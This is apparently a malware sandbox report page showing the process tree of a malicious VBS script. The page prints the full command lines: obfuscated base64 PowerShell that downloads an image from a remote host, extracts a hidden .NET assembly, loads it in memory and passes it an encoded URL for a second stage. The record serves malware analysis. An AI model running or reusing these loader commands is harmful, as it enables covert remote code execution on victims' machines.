| ZeroBOX

wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\xlaexpoittt.vbs
800
- powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = '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CcUzBkdIZQB4ShUWCcUzBkdIE8ShUWCcUzBkdIZgShUWCcUzBkdIoShUWCcUzBkdICQShUWCcUzBkdIZQBuShUWCcUzBkdIGQShUWCcUzBkdIRgBsShUWCcUzBkdIGEShUWCcUzBkdIZwShUWCcUzBkdIpShUWCcUzBkdIDsShUWCcUzBkdIJShUWCcUzBkdIBzShUWCcUzBkdIHQShUWCcUzBkdIYQByShUWCcUzBkdIHQShUWCcUzBkdISQBuShUWCcUzBkdIGQShUWCcUzBkdIZQB4ShUWCcUzBkdICShUWCcUzBkdIShUWCcUzBkdILQBnShUWCcUzBkdIGUShUWCcUzBkdIIShUWCcUzBkdIShUWCcUzBkdIwShUWCcUzBkdICShUWCcUzBkdIShUWCcUzBkdILQBhShUWCcUzBkdIG4ShUWCcUzBkdIZShUWCcUzBkdIShUWCcUzBkdIgShUWCcUzBkdICQShUWCcUzBkdIZQBuShUWCcUzBkdIGQShUWCcUzBkdISQBuShUWCcUzBkdIGQShUWCcUzBkdIZQB4ShUWCcUzBkdICShUWCcUzBkdIShUWCcUzBkdILQBnShUWCcUzBkdIHQShUWCcUzBkdIIShUWCcUzBkdIShUWCcUzBkdIkShUWCcUzBkdIHMShUWCcUzBkdIdShUWCcUzBkdIBhShUWCcUzBkdIHIShUWCcUzBkdIdShUWCcUzBkdIBJShUWCcUzBkdIG4ShUWCcUzBkdIZShUWCcUzBkdIBlShUWCcUzBkdIHgShUWCcUzBkdIOwShUWCcUzBkdIkShUWCcUzBkdIHMShUWCcUzBkdIdShUWCcUzBkdIBhShUWCcUzBkdIHIShUWCcUzBkdIdShUWCcUzBkdIBJShUWCcUzBkdIG4ShUWCcUzBkdIZShUWCcUzBkdIBlShUWCcUzBkdIHgShUWCcUzBkdIIShUWCcUzBkdIShUWCcUzBkdIrShUWCcUzBkdID0ShUWCcUzBkdIIShUWCcUzBkdIShUWCcUzBkdIkShUWCcUzBkdIHMShUWCcUzBkdIdShUWCcUzBkdIBhShUWCcUzBkdIHIShUWCcUzBkdIdShUWCcUzBkdIBGShUWCcUzBkdIGwShUWCcUzBkdIYQBnShUWCcUzBkdIC4ShUWCcUzBkdITShUWCcUzBkdIBlShUWCcUzBkdIG4ShUWCcUzBkdIZwB0ShUWCcUzBkdIGgShUWCcUzBkdIOwShUWCcUzBkdIkShUWCcUzBkdIGIShUWCcUzBkdIYQBzShUWCcUzBkdIGUShUWCcUzBkdINgShUWCcUzBkdI0ShUWCcUzBkdIEwShUWCcUzBkdIZQBuShUWCcUzBkdIGcShUWCcUzBkdIdShUWCcUzBkdIBoShUWCcUzBkdICShUWCcUzBkdIShUWCcUzBkdIPQShUWCcUzBkdIgShUWCcUzBkdICQShUWCcUzBkdIZQBuShUWCcUzBkdIGQShUWCcUzBkdISQBuShUWCcUzBkdIGQShUWCcUzBkdIZQB4ShUWCcUzBkdICShUWCcUzBkdIShUWCcUzBkdILQShUWCcUzBkdIgShUWCcUzBkdICQShUWCcUzBkdIcwB0ShUWCcUzBkdIGEShUWCcUzBkdIcgB0ShUWCcUzBkdIEkShUWCcUzBkdIbgBkShUWCcUzBkdIGUShUWCcUzBkdIeShUWCcUzBkdIShUWCcUzBkdI7ShUWCcUzBkdICQShUWCcUzBkdIYgBhShUWCcUzBkdIHMShUWCcUzBkdIZQShUWCcUzBkdI2ShUWCcUzBkdIDQShUWCcUzBkdIQwBvShUWCcUzBkdIG0ShUWCcUzBkdIbQBhShUWCcUzBkdIG4ShUWCcUzBkdIZShUWCcUzBkdIShUWCcUzBkdIgShUWCcUzBkdID0ShUWCcUzBkdIIShUWCcUzBkdIShUWCcUzBkdIkShUWCcUzBkdIGkShUWCcUzBkdIbQBhShUWCcUzBkdIGcShUWCcUzBkdIZQBUShUWCcUzBkdIGUShUWCcUzBkdIeShUWCcUzBkdIB0ShUWCcUzBkdIC4ShUWCcUzBkdIUwB1ShUWCcUzBkdIGIShUWCcUzBkdIcwB0ShUWCcUzBkdIHIShUWCcUzBkdIaQBuShUWCcUzBkdIGcShUWCcUzBkdIKShUWCcUzBkdIShUWCcUzBkdIkShUWCcUzBkdIHMShUWCcUzBkdIdShUWCcUzBkdIBhShUWCcUzBkdIHIShUWCcUzBkdIdShUWCcUzBkdIBJShUWCcUzBkdIG4ShUWCcUzBkdIZShUWCcUzBkdIBlShUWCcUzBkdIHgShUWCcUzBkdILShUWCcUzBkdIShUWCcUzBkdIg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';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('ShUWCcUzBkdI','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"
  2132
  - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://uploaddeimagens.com.br/images/004/634/676/original/rumpe.jpg?1697053529';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('dHh0LjQ2ZXNhYmVsaWZkZXRhZHB1ZGlvcmRkZW1tYWhvbS80NzEuNzMuNDUyLjU4MS8vOnB0dGg=' , 'dfdfd' , 'dfdf' , 'dfdf' , 'dadsa' , 'de' , 'cu'))"
    2228

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID

default registry file network process services synchronisation iexplore office pdf

Behavioral Analysis

Process tree

Process contents